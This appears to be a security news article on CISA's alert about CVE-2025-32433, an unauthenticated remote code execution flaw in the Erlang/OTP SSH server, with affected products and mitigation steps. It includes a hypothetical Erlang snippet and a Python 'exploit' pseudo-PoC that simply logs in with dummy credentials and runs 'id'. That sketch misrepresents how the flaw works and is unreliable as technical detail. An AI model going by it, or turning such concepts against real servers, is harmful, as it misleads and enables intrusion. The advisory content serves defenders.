CISA Alerts Public to Active Exploitation of Erlang/OTP SSH Server RCE Flaw

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a critical update to its Known Exploited Vulnerabilities (KEV) catalog regarding a serious flaw in the Erlang/OTP SSH server, designated as CVE-2025-32433.

This vulnerability allows for remote code execution (RCE) due to a missing authentication check for a critical function potentially granting attackers unauthorized access to affected systems without valid credentials.

The advisory urges organizations to prioritize remediation of this flaw, referencing the KEV catalog and BOD 22-01 for cloud services.

Technical Details of CVE-2025-32433

Description:
CVE-2025-32433 arises from a flaw in the way the Erlang/OTP SSH server handles authentication for certain protocol messages.

Normally, SSH servers verify user credentials before permitting sensitive actions, but this vulnerability bypasses such checks for critical functions, enabling an attacker to execute arbitrary commands remotely regardless of proper authentication.

The impact could be severe, as Erlang/OTP’s SSH server is implemented in a wide array of products, including those from Cisco, NetApp, and SUSE.

Vulnerability Classification:
Common Weakness Enumeration (CWE): CWE-306 — Missing Authentication for Critical Function

Affected Software and Environments:

Erlang/OTP (all versions where the default or custom SSH server is enabled)
Product implementations: Cisco devices, NetApp storage solutions, SUSE enterprise products (where Erlang/OTP is used as a base)
Other: Any custom or third-party applications leveraging Erlang’s SSH server module

Exploitation Scenario:
An attacker crafts a malicious SSH message or packet that targets the vulnerable function. The server processes the packet without proper authentication, allowing the attacker to:

Execute arbitrary commands on the system
Gain access to sensitive data or configurations
Potentially pivot to other network assets

Code Example (Pseudo-Erlang & Exploit Concept):

erlang%% Erlang SSH Server vulnerable function (simplified, hypothetical)
handle_ssh_msg(#ssh_msg_service_request{service = "ssh-userauth"}, State) ->
    % Missing authentication check here!
    do_privileged_operation(State); % <-- This is the flaw
    % ...

Note: The above is a simplified, illustrative example. The real vulnerability exists at a lower level of the SSH protocol message handling.

Example Exploit (Python Pseudo-Code for PoC):

pythonimport paramiko

# Attempt to connect to a vulnerable Erlang/OTP SSH server
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# Attacker's malicious payload would attempt to bypass auth in the vulnerable implementation
try:
    ssh.connect('vulnerable.host', port=22, username='noneed', password='noneed') # No valid creds needed!
    stdin, stdout, stderr = ssh.exec_command('id')
    print(stdout.read())
except Exception as e:
    print("Exploit failed or server not vulnerable.")

This example assumes the vulnerability allows command execution without valid credentials—like with CVE-2025-32433.

Response and Mitigation Guidance

CISA’s KEV Catalog and Prioritization:
CISA emphasizes the importance of using the KEV catalog as a key input for vulnerability management frameworks. The catalog now includes CVE-2025-32433, and organizations are expected to remediate the flaw by the stated due date (2025-06-30).

Mitigation Steps:

Apply Vendor Patches:
- Check with your Erlang/OTP, Cisco, NetApp, or SUSE vendor for available patches or updates.
- Apply patches as soon as they are available.
Enforce Authentication Controls:
- If patches are not available, restrict SSH access to trusted networks and enforce strict authentication policies.
- Ensure multi-factor authentication (MFA) where possible.
Disable or Segment Vulnerable Services:
- If the SSH server is not essential, consider disabling it temporarily.
- Use network segmentation to isolate affected systems from critical assets.
Monitor for Exploitation:
- Implement intrusion detection/prevention systems (IDS/IPS) to monitor for anomalous SSH activity.
- Review SSH logs for suspicious login attempts or unusual command executions.
BOD 22-01 Compliance:
- For federal agencies and cloud service providers, comply with Binding Operational Directive (BOD) 22-01 guidelines for vulnerability management and reporting.

Current Threat Landscape:
At this time, it is not publicly known whether CVE-2025-32433 has been exploited in ransomware campaigns. However, the risk of exploitation is considered high due to the potential for unauthenticated RCE.

The rapid addition of CVE-2025-32433 to CISA’s KEV catalog underscores the critical nature of this vulnerability and the urgency for organizations to defend against potential exploitation.

Network defenders should immediately consult the KEV catalog, apply available mitigations, and monitor for signs of exploitation. Prioritizing the remediation of this flaw is essential for maintaining robust cybersecurity postures in an increasingly hostile threat environment.

Priya